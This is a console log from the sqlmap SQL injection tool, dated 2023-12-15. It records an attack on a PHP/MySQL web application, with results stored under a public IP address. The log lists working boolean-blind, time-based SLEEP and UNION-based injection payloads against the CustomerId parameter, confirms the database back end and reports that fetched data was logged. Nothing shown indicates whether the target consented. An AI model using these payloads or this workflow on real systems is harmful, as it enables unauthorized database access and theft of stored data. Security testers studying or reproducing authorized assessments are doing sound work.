        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11.2#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:14:52 /2023-12-15/

[10:14:52] [INFO] parsing HTTP request from './src/request.txt'
[10:14:53] [INFO] resuming back-end DBMS 'mysql' 
[10:14:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CustomerId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CustomerId=1 AND 3602=3602

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: CustomerId=1 AND (SELECT 2831 FROM (SELECT(SLEEP(5)))Akyg)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: CustomerId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7171787671,0x76646c536467575374417746646b4261426252534e50556550566758744c61424f4b565064616272,0x716b627071),NULL,NULL,NULL-- -
---
[10:14:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.28, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:14:54] [INFO] fetched data logged to text files under '/home/tunc7/.local/share/sqlmap/output/54.254.196.11'

[*] ending @ 10:14:54 /2023-12-15/

